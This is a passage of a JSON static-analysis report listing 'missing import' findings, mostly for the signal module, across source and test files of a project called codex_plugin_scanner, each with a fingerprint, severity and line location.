"", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1894d47ecc3704370142514f792a2f5a837922b512dd030ab15ddafaac22e1f4"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/detectors.py"}, "region": {"startLine": 855}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144962, "scanner": "repobility-ast-engine", "fingerprint": "ca534d53ca55036daff3939c3ac00b4056ccd7cb48130e16face45acc7fb5f80", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ca534d53ca55036daff3939c3ac00b4056ccd7cb48130e16face45acc7fb5f80"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/runtime/supply_chain_package_eval.py"}, "region": {"startLine": 1774}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144943, "scanner": "repobility-ast-engine", "fingerprint": "46beaed9068f92121c824fbb087db4a4f0c5ac1d62ddfc8683a4aab80be17b01", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|46beaed9068f92121c824fbb087db4a4f0c5ac1d62ddfc8683a4aab80be17b01"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/risk.py"}, "region": {"startLine": 241}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144940, "scanner": "repobility-ast-engine", "fingerprint": "3e61e8155fce91d32a019bff2df5a89fc4f1872882124416d72365a4a94b23b8", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3e61e8155fce91d32a019bff2df5a89fc4f1872882124416d72365a4a94b23b8"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_cisco_runtime_cli.py"}, "region": {"startLine": 272}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144939, "scanner": "repobility-ast-engine", "fingerprint": "9a73f43b1c918be93382b0ac22ae79773d3d5a691f1dc8fdf3e335e577765989", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|9a73f43b1c918be93382b0ac22ae79773d3d5a691f1dc8fdf3e335e577765989"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_risk.py"}, "region": {"startLine": 3997}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144938, "scanner": "repobility-ast-engine", "fingerprint": "5d9c4d047362d755c2316f0b930b50aa124f1e0ba8fb61e027dc492cc5daee06", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5d9c4d047362d755c2316f0b930b50aa124f1e0ba8fb61e027dc492cc5daee06"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_cisco_evidence.py"}, "region": {"startLine": 63}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144937, "scanner": "repobility-ast-engine", "fingerprint": "775e5263325c17ec47e07f54247ee847c3bd6a7d60ad981c9e53f60aa2ea505b", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|775e5263325c17ec47e07f54247ee847c3bd6a7d60ad981c9e53f60aa2ea505b"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_signals.py"}, "region": {"startLine": 31}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `copy` used but not imported"}, "properties": {"repobilityId": 144919, "scanner": "repobility-ast-engine", "fingerprint": "ec629276d1007f42d5de1dec57b49671b29dcabf8bd17cba2fc688dbf97fb3ff", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|ec629276d1007f42d5de1dec57b49671b29dcabf8bd17cba2fc688dbf97fb3ff"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_provenance.py"}, "region": {"startLine": 362}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144912, "scanner": "repobility-ast-engine", "fingerprint": "e129447ba66a1a78fab89db23ff5d4818d4947b56bc3221cb14979ac07930bbd", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|e129447ba66a1a78fab89db23ff5d4818d4947b56bc3221cb14979ac07930bbd"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_skill_protection.py"}, "region": {"startLine": 244}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144911, "scanner": "repobility-ast-engine", "fingerprint": "3bccbfdb70fc9f27989728d55748e8f78b8c47f035aec40143a5a74612972234", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|3bccbfdb70fc9f27989728d55748e8f78b8c47f035aec40143a5a74612972234"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_mcp_detectors.py"}, "region": {"startLine": 374}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144910, "scanner": "repobility-ast-engine", "fingerprint": "b292ef4cbe893eba66d9f3c3bbc31153ece4abed8058f47ddf36c1f15839dd89", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|b292ef4cbe893eba66d9f3c3bbc31153ece4abed8058f47ddf36c1f15839dd89"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime_detectors.py"}, "region": {"startLine": 316}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144907, "scanner": "repobility-ast-engine", "fingerprint": "261ad75e6ad95f299742d679eef316a53dd84baa85adb9dc82ad90c5dbb972da", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|261ad75e6ad95f299742d679eef316a53dd84baa85adb9dc82ad90c5dbb972da"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_runtime.py"}, "region": {"startLine": 9621}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144906, "scanner": "repobility-ast-engine", "fingerprint": "1763ba1bdc7ce79c73126378ba36b65bd82292d167690b20b4c2ae71a6756630", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|1763ba1bdc7ce79c73126378ba36b65bd82292d167690b20b4c2ae71a6756630"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_skill_protection_phase14.py"}, "region": {"startLine": 31}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144903, "scanner": "repobility-ast-engine", "fingerprint": "4c013c27c12ae8b0ea6ea2d6c936aba59cdca6542743252652367b6d98811114", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|4c013c27c12ae8b0ea6ea2d6c936aba59cdca6542743252652367b6d98811114"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_phase05_approval_memory.py"}, "region": {"startLine": 414}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144902, "scanner": "repobility-ast-engine", "fingerprint": "5b6a3c5bf88ff40caaeddb496cffc7a3d219d0c653c28fc0f7d339e9576f6805", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|5b6a3c5bf88ff40caaeddb496cffc7a3d219d0c653c28fc0f7d339e9576f6805"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_data_flow.py"}, "region": {"startLine": 183}}}]}, {"ruleId": "MINED107", "level": "error", "message": {"text": "Missing import: `signal` used but not imported"}, "properties": {"repobilityId": 144900, "scanner": "repobility-ast-engine", "fingerprint": "656d24e6dc746bb67d9ab9f6aa44aa289b7ba7a32d5983ec5c0b3a28bcf19553", "category": "quality", "severity": "critical", "confidence": 1.0, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"mined": true, "mining": {"slug": "missing-import-python", "owasp": "A06:2021", "cwe_ids": ["CWE-1075"], "languages": ["python"], "observations_count": 2192}, "scanner": "repobility-ast-engine", "correlation_key": "fp|656d24e6dc746bb67d9ab9f6aa44aa289b7ba7a32d5983ec5c0b3a28bcf19553"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/test_guard_supply_chain.py"}, "region": {"startLine": 174}}}]}]}]}